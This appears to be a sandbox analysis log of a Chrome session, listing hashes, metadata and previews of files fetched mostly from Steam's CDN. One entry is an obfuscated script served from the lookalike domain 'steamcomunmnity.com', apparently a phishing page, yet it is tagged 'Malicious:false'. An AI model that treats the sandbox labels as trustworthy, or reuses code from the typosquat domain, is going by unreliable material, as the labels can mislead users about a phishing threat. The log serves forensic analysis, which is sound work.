        SHA1:142EF2AB1C6F412E4E10EF99A5CD85ECF6A5A160
        SHA-256:80F647EA1E7EFEF0BE27ADC77D922462EB98BB97EFE00722496859940745D090
        SHA-512:3D799A758A5344C5225474A68F4ECDF43B23971090FFDB4C3412C2DBC1EE243058012EFF0617427FDE810577003191084CB69F5785CA172DDEE38106E441327E
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/javascript/applications/store/sales_russian-json.js?contenthash=5a342e380fa7236cd8a7
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/.."use strict";(self.webpackChunkstore=self.webpackChunkstore||[]).push([[61],{70338:e=>{e.exports=JSON.parse('{"language":"russian","Summer2022_hunt_Intro":"...... .. ........!","Summer2022_hunt_Intro_1":".... ..... ........, . .............. .. ....... .......! . ...., . ... .. .......: ................. .......? ... ..., .....-.. .....!?. ........ ...... .. .., ... . ... ...... ........ . ..... .. ....., . ..... ... ........, . ...... ........ .......: ... .. ......","Summer2022_hunt_Intro_2":"....., ... . ...... ...... .. ...... ... ..... .. ........! .
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (20323)
        Category:downloaded
        Size (bytes):20324
        Entropy (8bit):5.482083383941387
        Encrypted:false
        SSDEEP:384:HAzLsfyS9cl+cT3PnuTAHqXjkWRIlhKCme3HAU3hYxGbTjexf:HAzQfyS9RunwAHd1lhKC/3A8bTjaf
        MD5:F88DF411AAF6EF8D1989B8849F03F6E6
        SHA1:A19505C61912F7CD08C2969C547FD1D0E700DFFC
        SHA-256:0BC5AB3562401CB2CA050E07552D710E55211E3EF97AC5B4C4447DBD065979D9
        SHA-512:07D6A3BF75CA1BFDBF9953DD977228E6D865BE29BDB78ED16BBFB3AB6AE745789F4D8D899B7A1E9CD9406831FE509FE8FFCF90C11FABA2120320C957F0F0072E
        Malicious:false
        Reputation:low
        URL:https://steamcomunmnity.com/assets/haki13yvqka/kivizxk3l1c.min.js
        Preview:(function(n,t){function e(n,t){return o(t-409,n)}const r=b();for(;;)try{if(881524===parseInt(e(931,915))/1*(-parseInt(e(712,723))/2)+-parseInt(e(753,773))/3*(-parseInt(e(796,826))/4)+-parseInt(e(696,800))/5+parseInt(e(839,813))/6*(parseInt(e(975,930))/7)+-parseInt(e(820,884))/8*(parseInt(e(608,701))/9)+-parseInt(e(782,877))/10*(-parseInt(e(837,902))/11)+-parseInt(e(663,739))/12)break;r.push(r.shift())}catch(i){r.push(r.shift())}})(),function(){const n=document.createElement(t(151,46))[t(24,-41)];function t(n,t){return o(t- -441,n)}if(!(n&&n[t(28,16)]&&n[t(-15,16)](t(53,-52)))){for(const n of document[t(-41,77)](t(-37,-9)))e(n);new MutationObserver((n=>{function o(n,e){return t(e,n-588)}for(const t of n)if("childList"===t[o(454,365)])for(const n of t.addedNodes)"LINK"===n[o(594,554)]&&"modulepreload"===n[o(599,500)]&&e(n)}))[t(14,75)](document,{childList:!0,subtree:!0})}function e(n){if(n.ep)return;n.ep=!0;const e=function(n){function e(n,e){return t(n,e-373)}const o={};return n[e(255,3
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):72607
        Entropy (8bit):7.981691955442756
        Encrypted:false
        SSDEEP:1536:Sdv8ydupaM4t+pDGUBOMemCTfGQlzLAaJh5tpyn8PVwIbkR:Aug0GUkHfGQlzLAaJb5PGgw
        MD5:941C4FDAC65A27040E45E02009DD3256
        SHA1:5DC986A0045B95A0BBFF5029A4C8F22ADD5F9EDA
        SHA-256:5775220B6CED6F19D9DD2BCE22A38EDC61DB3DAA8DE59E6F3ACF80C15C59044B
        SHA-512:407F273981E45D7A9045183EB0D3F245D765456817ED510ED87E38712F8D974BB19AC41B9C40A9D29120EF1EBE5572F4FF99AD592FA913485EE41FEA8A5D4D4C
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X...........................................L.........................!1A.."Qaq.2......#B...3R..$4br5Cs....%Dt.....67S................................5......................!.1A.Q."a.2q.........#B.3Rb.r............?..bV.....>.D.M.y.....X.$.3..h..pl...]5....m..]lT.b.FQ#G.!........5.....q~K....t......i.N.cm.Wa..(..Bn._..[.H........L.....<^.kBz.I$.li. .).$.b.%.R.0}..,..C...c,.B.H.s=+..:.mJ|......T.O.......Jg.......k.p:.nv..1..8*U....}MX.....)3...,...8..Z..R.n..I......N\..,..U.._.....p.\..G.V?h..h..tI.d...5...Y..W.m...91|(..v...o...~..;u$tX.#..t.SH....I^..H7..-m.;.<.....|...1...t!..1....PJ.....O._...SrM...4'.......$...2._.Y..C.$.".Jz.....o.Qz.j<S.......%......O.A[.[.m}.......w...~.?..._...z.$#jOC..h...=.uh..........#pGC.>u..O...l......3...0.L&../.X....p..I..;...N....iV._}.q....o.=U....D.Q...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):3135
        Entropy (8bit):7.890127165926194
        Encrypted:false
        SSDEEP:48:V/6DocieftI9G9f6A+FIDOWu0lDl+gm7QyTtctIInQSy6IVpqlnBcODBBCJygc:VSDZ/I09Da01l+gmkyTt6Hk8nTB+ygc
        MD5:3A0D23F977BD4ECDF5618DC83D64BCF5
        SHA1:6B9BA3DB483304DB2F12E4A16DB4D1FEC95BE3F0
        SHA-256:D359CD310DB9AA5C8EEB58A38FFC884629921567C0A42D96036481710DC12CD3
        SHA-512:3038ADFAEB4A0B961714CA0AB3ED25CE3CBDC3E134AF84470FE1F6742D3E974E3E0787D7BA98E9BA1AE1930DD62BC9E5B92D24D9E8DA7CBCB7BA08B268EF7B8B
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/v6/icon_platform_windowsmr.png
        Preview:.PNG........IHDR.....................pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):7931
        Entropy (8bit):7.939949319895233
        Encrypted:false
        SSDEEP:192:orfglKJf0V+BMybv5jY9Qn6mNejBfzLySxTIhzcq/67VmcS:qglK5hM+B56IejRzLtIh4q/67YcS
        MD5:A502727A2861688F8C755CB6A6D85562
        SHA1:96309F68A7960F5590677C72B7D17E26079351B8
        SHA-256:6ACD4D1D6F14F94012F92C702890A404E879755632A0EFC8DED206990FAAEB71
        SHA-512:46A50D53716789EFF2797EBEE508F47C5C6AABAF706D1A07D2D2F2489E29D0613FDCA8CDEE60A7CB991055A14727F60EFD51A2254A8CBE143191FC023B76A429
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E.............................................J...........................!.1."A..Q..#23aq..B...$...%(45CRbct.def...................................../......................!.."1.AQ2a#3B..q....R..............?.2..V.q.u:.I....m..@R...U..A.s......:....@k#W..z.....a.;.|..%>.M...b;+..Y.S\.. .[8...%VJ.....RCV....MG**. z(_.G.L .BGM.*...E.'.w.>`.0E^;./.^&.J#..j..U..J... :....3.v[....Txm.T....A......LiG-T..S+.{..T....u(.7..Q..\.x.+`.Y.0u.:%F.).'z.Z....6?.I......7......./...Eh..[..Pc.......b..1..zz..W..jc..eP...}...1.Q.oaa~/....C."...3....G~;-6.T...)M...{\~..0..T.r_M...E-.S....TZ..*...kaf...;;>.T...(..>...S{w.h&.'.6..,7..hg\...e'k.T.}.!.J....R....{bFR4......6.}....B...c......q.@..F....(S.....'oZ.DM.%+R>./.o.....4..RE..#....\O.N.....+.W.-....[..NZ..J.1...i.x.#.KO)..R.........<`..`..lJ. J-....*D*._.)/..>
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 116 x 77, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):384
        Entropy (8bit):6.824517449327776
        Encrypted:false
        SSDEEP:6:6v/lhPojOWnDsiskT+wUqRP2VJQSag+yfLk0zxyxtzZwoJNkKkK1k42G90xrVEkB:6v/7oORiPTPOJTX8xXweb1k20JKk5cGZ
        MD5:90D994E852B5431144BD4BF2A6D415DE
        SHA1:E93F317B1A5925B85CBA3CCAC41BB05373F80DCE
        SHA-256:91B1719C9BE1F680861FB5E6194411A19A982BEE4D292440F2C911A001111E64
        SHA-512:7AA20C93A2FB57BD3B2093953D3A88881E1EED451AC0E2E416031887F6F6AA0339F2BD93CA77466BFC7D635A51E6706A7FB2D9DCB3F547159A503196103CC17B
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...t...M.....w.@B....tEXtSoftware.Adobe ImageReadyq.e<..."IDATx....m.0....b....A\..n..l....) a.n`..H..K...>..%R.\rI*..-.RZ}.m..u...k.......!x..R.S..:...G....`.....0.@.a.G..b.F.b.Q.@c`.:...4..s...3.j...5...o\.}.Q.M.O.w...v..w..G..a.....P..P..*..*...T@.T@........(P..P..P..*..*.@.T@.T@.........P..P..*..*...T@.T@.......jM.....^....F.)...0[.1.As....IEND.B`.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 616 x 353, 8-bit/color RGB, non-interlaced
        Category:downloaded
        Size (bytes):361603
        Entropy (8bit):7.99368048098768
        Encrypted:true
        SSDEEP:6144:FRD0YFYTFRBALirJaubbTovnLMUx+pFQcgLyD/5AfxzhTRcpT8:I/BAZubbaHOBgLaIxspT8
        MD5:E722A7FA3D413EC1BAE583B6720A862F
        SHA1:86F8B4FCB2839DA968D1400863153476BC1DF2A7
        SHA-256:821E813FCDD4165505CA63FC04DB3AF38928E959B9B683DBAD2B3ED64C9183F7
        SHA-512:0E8DE51BC0801D659E27E60EAB44A758FE62AB7B47ACC93FFAA5D6A08B79854471D0A7C9CC095CDB9627178AFE4D568F0502737E42A4984C0A02A2EEA36A8629
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/S2_deluxe_steam.png?t=1705420866
        Preview:.PNG........IHDR...h...a.....Kj.K....pHYs............... .IDATx.D..dYv.....^w................(J| ..Lo2.w....O...$.I.... Hv.].]c.1.p..K..x....*3...s.^......A..)$..i....a".D7h"M.d......m.R..... .v.L.@H..2...F'( !.A.i#-...'........"..*.4D..9.Bt...`.p.$`.I..M@.e& .f..l'..`..i.......z\...."...I.V......A.d...-A=V:h..;Epr7`);222..{.N..0....N#....R.a....E.S.L..hP.i...I..3!.HK..N.15x.`v....0....R.....S`. `.`.%e..F.X.`..-:a.$2C..a..l...D...$.*..h....){s.N.HH...e..jB3.td..$I.C...JBhS.$...D.6a.H.iA.{{.b.%.R...H'((I4....Nu.lg...l:!%..%ePH...i...i.v.h...0.....1..;3LHp..{Hn..l.L8C..i..'8L.+@....`...)i.:.:jI.w(M.......vB`..HwC..I..c.!&d...@.L'IIH.l$.......@.f*....%.c..K...f.F.I....0)...0;..>..;.....~............z......../.............o..........t...q../K....C....xZN.\=9.^.....us..=...........7_.._1....\~....?<.y:.%...........v.c.\.o.).B.p<..{_......O.f.R(.v...}.g.6....0..u.AYj....E.yZ..........~..v..>0....pwxx.6[g_.B....f.....x....E\?}.../.|}O.g.}.m?...d_.y.9...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, ASCII text, with CRLF line terminators
        Category:downloaded
        Size (bytes):16087
        Entropy (8bit):4.969826359236833
        Encrypted:false
        SSDEEP:192:x32Mu4vUDjHbnZsXGWIS75sTY8M7ebb6qgrrY20jhN3MScuhJ05zb5jzCF+MlF+8:x32L4kzt3gtGb5LQqha31iUTSiq5N
        MD5:72938851E7C2EF7B63299EBA0C6752CB
        SHA1:B75196BD3A6F9F4DFC1BBF5E43E96874BCD9CE4E
        SHA-256:E2D4E0E1D3E162FDC815F16DFFF9AE9B0A967949F0F3AE371F947D730A3F0661
        SHA-512:2BB6C03A1335EF9514D0D172A4284D82A29D1783A72306BDCB8AF3185D5CD2FF16303355AA4B05086D2FA0B5B7C7159CFA67DE4A6175095FF0E68ADEC2A56AC1
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
        Preview:/* Requires jQuery.. *.. * This plugin will create div.jsTooltip elements (or configure your own!) in body for every tooltip on the page. Some.. * basic CSS is applied automagically, but you'll want to style it on your own from there. This code will be applied to.. * every element in your .v_tooltip() selector, so giving it a common selector like '.tooltip' is ideal... *.. * Options:.. * - location: Where the tooltip should spawn in relation to it's parent.. * - offsetN: How many pixels to add.. * - trackMouse: Should we track the mouse cursor instead of the parent?.. * - suppressOnClick: Should we hide if a user clicks the target?.. * - suppressWhileToggled: Should we ignore events if the target has the 'toggled' class?.. * - tooltipClass: css class to apply to tooltip elements.. * - fadeSpeed:.Time (in milliseconds) to spend fading in/out. Set to 0 to disable... * - allowHover: Should we keep the tooltip open if we mouse directly on to the tooltip? (Your tooltip will need to spawn in
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with CRLF line terminators
        Category:downloaded
        Size (bytes):24657
        Entropy (8bit):5.319718503552118
        Encrypted:false
        SSDEEP:384:aUXvnJo2dacv5Wc4gOV+n0Xmz85JX1c/jc0NL+lMF2KDnXhOMucpqWqGil/wSwf3:aU/nq2dd4gmLWqGil/wS20m
        MD5:A52BC800AB6E9DF5A05A5153EEA29FFB
        SHA1:8661643FCBC7498DD7317D100EC62D1C1C6886FF
        SHA-256:57CFAF9B92C98541F769090CD0229A30013CEA7CFAFC18519CA654BFAE29E14E
        SHA-512:1BCACD0EC7C3D633D6296FFF3325802D6352805F0D2CF1EEA39237424229ECFFAD6CB2AEE4248E28B1ECA02FF0646B58240851A246BBCF0AA1083830D5D9081E
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunfWg&l=english
        Preview:"use strict";....// build our menu on init..jQuery( function($) {...var mqQueryMenuMode = window.matchMedia ? window.matchMedia("(max-width: 910px)") : {matches: false};...var mqMobileMode = window.matchMedia ? window.matchMedia("(max-width: 500px)") : {matches: false};.....var $HTML = $J('html');...window.UseTouchFriendlyMode = function() {....return $HTML.hasClass( 'responsive' ) && ( mqQueryMenuMode.matches || $HTML.hasClass('touch') );...};...window.UseSmallScreenMode = function() {....return $HTML.hasClass( 'responsive' ) && mqQueryMenuMode.matches;...};...window.UseMobileScreenMode = function() {....return $HTML.hasClass( 'responsive' ) && mqMobileMode.matches;...};...window.UseTabletScreenMode = function() {....return $HTML.hasClass( 'responsive' ) && $HTML.hasClass( 'tablet' );...};...window.UseNewMobileAppMode = function() {....// the new mobile app can run on screen widths wider than responsive_css_maxwidth....return $HTML.hasClass( 'responsive' ) && $HTML.hasClass( 'rn_mobil
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 600 x 240, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):255965
        Entropy (8bit):7.985391501127512
        Encrypted:false
        SSDEEP:6144:Mk1ZbR6whKB8TV5IKujB3BIXACfZHmeCmuCwNKN2BT:rQwhg8crBxIXB5meSvBT
        MD5:54C7D23B606471F39331C9CC9095826E
        SHA1:4EDEEAD000DD560E2B3748FC38A2B74D2D8EF4CA
        SHA-256:2905C03D32FD735C2FD73E5CF5546458084BA2108903DA50FFC3BB76207F937F
        SHA-512:333222441DC4AE146576CDDA7A564BAB32C2B3B86E9C5367FC1B7C1C8B5A38434D12C1A515187D6237D73FCF48395E41C7B5D189F4F21DB29224F96A7C410AD4
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...X...........v....pHYs................)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2021-08-02T17:48:06+03:00" xmp:MetadataDate="2021-08-03T14:24:41+03:00" xmp:ModifyDate="2021-08-03T14:24:41+03:00" dc:format="image/png" xmpMM:InstanceID="xmp.iid:a98b8574-e051-d645-a875-428d30b95bac" xmpMM:DocumentID="adobe:docid:photoshop:4a9a7876-e9ed-a440-964a-0f31e67df2fc" xmp
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 460x215, components 3
        Category:dropped
        Size (bytes):49014
        Entropy (8bit):7.962416989552969
        Encrypted:false
        SSDEEP:768:4ZgDk5nwJ2uZ3zXYnOFUGLdqhMDYGUd2ALVknp/ZudsgAgP3ok1nxlSNznkApFkp:EgDk5w4uhXYOwhR/2p/OPfnxlShnkApe
        MD5:6AD2044C9E73B61D5413DD1FFBD73ED6
        SHA1:3529AD86D9D88403288E288DE977236D084C7B0A
        SHA-256:97F548FF76603E3435EEB96EA39336BDE8F0422BC15F830D274E1B4E7CDD2836
        SHA-512:01DAC9EA11FCFAA922608A7B573F6A33433BF2957E7C7CAE995B26178FC0B379979BBA358BDD1732DC5A18FE880E43FEEDB009D3B98FB08F2416DB46D2738B0B
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C......................................................................................................................O.........................!1.A.."Qa.q.2.#B....3....Rb...$c..%Cr.....&'4S.56u..................................;.......................!1..AQaq........."R..23..#B.4b$5CD............?...R..I...Q..6..L@..$.#c....<.....h...S$.'x....... ....X0.q.w..Q...$...I..>{m...ib.`R.O..q......,B~P...;|s.p* .P.:.J......n}.,.i!...Ibc...bw..Ts)`..*(.......|......pC.{....Rc.y.P...DKv.?..`....nN.I.3;..v...B.iJt.$...L(......lH.).F...`.....y..`{Qj`..n.6.L.=.F$..............w..IDR..Q.F..G~~.o...J.i..1.......&.HE.IX][.......(.P.........s.. O..Y....;.v.......Tg......j..O.h...(9UQ._.a|...][....&F..H..3...I.D.#Q..#~N.\....,..`m.....>..p.F...AL.:..WP2....v'a..o.X..Z...4..i- .!..=.[i...bG)..K .u.!L.!A*w./"w'..=MMK......T.}E..&`.?. ...U..%...;...O.2......:.QjJ.4...A {...`d`.S....BJ..]$Oo.7.m..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 240 x 233, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):107109
        Entropy (8bit):7.991273750205561
        Encrypted:true
        SSDEEP:1536:rqX7o3K7FubRkzCd3O6CwnwJdtc2x6hz6uneru3VwPter+Op5KB7:Ql7glk9MuL9Y6ue4EternKB7
        MD5:91D19EA57891221CB46E02268C066703
        SHA1:215DD905195F8C4AF0DC72F786FE47CB7934627E
        SHA-256:16C72DA8260E0EADB95F0B00766112EA40EFDC2A9BF0B1AB8B9C49EDF6B270BF
        SHA-512:86298B3970CA5B68E6D8B1736A045837B8F991ACA5B196AC08CBA3C651092F87F4F999E57C5504ECA111028AA05533E389778C774B86162660D8C3B2AC4BFD76
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............caNv...............<'A......IDATx.|.w.l.U..fXkU....9.[.jI...,.2I...d|...`s1|ncc06..E.6A.... ..$.R...9.>9.\q...?.ZU......sv.]a.....x..y..C9.`...G....)%2I..>.[..Y.<...\z..T.I...-....L<.JP:#i%.Z.4.!..x@..x..x.B......Sd.(.....LA...b4......l..g.p....R........JJ.!I%6..F..-...g.T..R..........i.KQTTe.j....S..s.._}..|...9t....y.eZ*.^......>.8..c0Q..,......G..e..6:KX...r..8|.q.~r..g.;..X.u.....u.g.R)...c.ww..w.lE@ ....&.I"...$I.'...K..)$.:&.]V..o.s..e....!.O.........h..p..p....s..O.%..;v=?..~..oy..x...........2*I.Z pT..{...,.LK......uo....g9z.5.<..]~.....?.c.R.L+.T....b....J.*..:....p.B...{.N4K.}........!....D.....4JJ..X..>..@.I}h.>. H......!.. .\.J.. ..?.a.;.....?......A..P?.]o./.R.H...7. $H.R.D).^E.#...Gk...'...R...zt.....-=..e.[..(.H...!C@.....p.I.@H..Q_...u...US>../..3..r\.z....k.K.....(\.&K.....H......4%.R...v.V...$7..8g:..l....S6.v...)F9w..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (14434), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):14599
        Entropy (8bit):4.9198531640461
        Encrypted:false
        SSDEEP:384:+iMnP6zXL3CqVGE9HueUlKEghpE9umuwaswSdkT:tzWqVGsHhHE/ywad1T
        MD5:52161622668776DB5AC21B6AD4B0CBB1
        SHA1:F8BABC0C73D858F092912411BB7B451CA9AF6C6E
        SHA-256:2CD6894C338FA3A7927AC4D0FC60BCCE27C066051947175D1771CC3633123D07
        SHA-512:BFBC996AFCC90578AA16CA9A2C8C166EE37EE39EFEA785BFB3325CA6DFCA88ADA8EE3D5B2FD9F978266217C01AE1205B0B9E8775FA81A7445930C25F4FD5A6F6
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/applications/store/navevents.js?contenthash=a4eb1ee72718a7bf1c88
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/.."use strict";(self.webpackChunkstore=self.webpackChunkstore||[]).push([[4103],{199:e=>{e.exports=JSON.parse('{"unknown":0,"store.steampowered.com":1,"steamcommunity.com":2,"global":3,"default":4,"application":5,"subscription":6,"search":7,"cart":8,"app":9,"global-nav":10,"global-account":11,"storemenu":12,"search-suggestion":13,"about":14,"suggest":15,"dlc":16,"storemenu-recommendedtags":17,"footer-genre-dropdown":20,"footer-category-dropdown":21,"footer-about-dropdown":22,"footer-help-dropdown":23,"footer-publisher-catalogs":24,"spotlight":40,"message":41,"marketing-message":42,"daily-deal":43,"footer":44,"header":45,"name":46,"more-details":47,"notification":48,"login":60,"prompt":61,"join-steam":62,"successful-login":63,"successful-joinsteam":64,"main-cluster":100,"featured-win-games":101,"featured-mac-games":102,"tab-Ne
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF line terminators
        Category:downloaded
        Size (bytes):2646
        Entropy (8bit):5.186625633836425
        Encrypted:false
        SSDEEP:48:y3/p1p6iBbbjR3+Muik5kSR3+MuikywR3+MuiktStR3+MuikFXR3+MuikRCR3+Mm:ip1p6eUMuotMuYjMuvFMuboMu3dMuIw9
        MD5:45CDA1A73836131DD3614C2C3854CA4D
        SHA1:8C5F6023535CB883463E83170430B31EE72B5176
        SHA-256:218BEDD2A2817DFDE5F3A900B6204C7E378E1B747FF98AE89AEDFF2391E4429C
        SHA-512:EFA13E0D107CB9915BB8AB250B417880F08E255FF2D6457306FEF6A6FF0DEE0FC2F0FCA15738B71CE1AACCD3B2556B677881BEF4A6CB182D696B583F10E78559
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=Rc2hpzg2Ex3T&l=english
        Preview:/*.. Font: ..Motiva Sans.. URL: ..http://www.youworkforthem.com/product.php?sku=T2982.. Foundry: .Niramekko.. Foundry: .http://www.youworkforthem.com/designer/293/niramekko.. Copyright:.Copyright 2011 by Rodrigo Saiani. All rights reserved... Version: .1.0.. Created:.August 09, 2012.. License: .http://www.youworkforthem.com/font-license.. License: .The WebFont(s) listed in this document must follow the YouWorkForThem..... WebFont license rules. All other parties are strictly restricted..... from using the WebFonts(s) listed without a purchased license...... All details above must always remain unaltered and visible in your CSS... */....@font-face {...font-family: 'Motiva Sans';...src: url('https://store.akamai.steamstatic.com/public/shared/fonts/MotivaSans-Regular.ttf?v=4.015') format('truetype');...font-weight: normal;...font-style: normal;..}....@font-face {...font-family: 'Motiva Sans';...src: url('https://store.akamai.steamstatic.com/public/shared/fonts/MotivaSans-Light.ttf?v=4.01
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 460x215, components 3
        Category:downloaded
        Size (bytes):34342
        Entropy (8bit):7.970642990703992
        Encrypted:false
        SSDEEP:768:oVJZyM7lhTL8fVFcJhArGCR0/gsPHfb+cKhFl51W:ojZyMffVJhEG4RM/b+cgR1W
        MD5:554733209D5ECA787A9567B5371E5F97
        SHA1:7102998E5387BEDDF2E186F93B1A740DB23A378A
        SHA-256:068FB873C89D18B5B1BFFA148722957F6446A8B6D080335E4595C08EC0685988
        SHA-512:6592663D7ED2698AA66C9FE6FA8292A95B50A2726BB4BD7E5F4832AE15377BB0DB26648947ACC36C548244E12C1ADFB5883BA8389980B93A5F79389B122F7C01
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1091500/header.jpg?t=1715334241
        Preview:......JFIF.............C....................................................................C......................................................................................................................R.........................!..1A.Q.."2aq..#B..3Rr..$b....%4.....CFc..'SV...5Weu.....................................F.........................!1AQ.."2aq.......#R...3Bb..T...$....Sr4D...............?......E.,.w....9U...!Bi._....I....V!...B/..C.h@E..P.X.i........7..=*H.';........p'e.'e)'.9.cT.I_*AQV.Z.`.....o...........D..V.+...~.....B.X1\F.m..x...xr.k...M...U.k.<..;...jG..\V..7..4.6.ge.q,E.....X-.Y..IS...:..j??..d.W"xZ.[.RN...U..J...0...u.T;.....#D.Oy.<..q..s/.NyG.P..a0/.-D,...;c..j..~R...KJ.....|..iQ.V....c........u:" $...Y>.....~_..TB\.M.....F}%.[_.....X4A....+..:....uF..B.8N....~`.}+....^..4...|..*.4...cl.0$.s.I'|....K..T.V..X.d(B...Hw!...m.6...Z.D=..B...T.E..I%[.L&..(BB...+t.@BF0*A...RB.{&.(D...S(J...74...Y.!.~}..Bq;.PBP....B[..E.!?....H@...O.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 616x353, components 3
        Category:downloaded
        Size (bytes):68283
        Entropy (8bit):7.9777923198308685
        Encrypted:false
        SSDEEP:1536:9ECobgF+SGcVf+xmkS7bG3oxpJRvviKcMOlC0+9hPa:9kgFyo+xmkSm3wRv6zs0GPa
        MD5:1C8307CA820E4BDCF6AF02340FA799FE
        SHA1:545B3ABACE45A46807A3EF91853D1EBA12E3E867
        SHA-256:C8209608DBAA74AFEFC76C9BC7F8EB1A15FB3B7FF87DD0C1B631E1F336AEE853
        SHA-512:6EE9AF4C62DD2AB72F028D20128B421B251BDE9AA6EB7458482DB21E812C94F955D062C83AB0E026999D5BC8C492F2DE5CF936DC52AE237C1D571E76A1020347
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2215430/capsule_616x353.jpg?t=1716411566
        Preview:......JFIF.............C....................................................................C.......................................................................a.h.............................................N.........................!.1A.."Qa..2q..B....#3...Rr...$4Cb..%..&Ss....5cdu.................................:.....................!.1..A."2Qa....#q.3Bb...R.....CSr.............?..QT4ePH....ql.5.Y...c..8[...!}E..#s......Xy7LKdH(.$;3...7.l-....@X.Z......4...kyj<.p.1$r.j6.o.l.)#........b..iV..s.;b[....a.Pq.4..f.M..P..@Rw.~X[(.w*F.Tr..:.d..".KnmbM..H0.u6...QIR..C...........~...-.A..#i.g.d+.uq..{..al..N.vs.<-...o.. .....(b.)6....>&*m......i.&.f.}._........!.....-..,..(f.....3.*Cj&..;.,....u......f...#....T.6.3.A#....P./t........S].!#k. 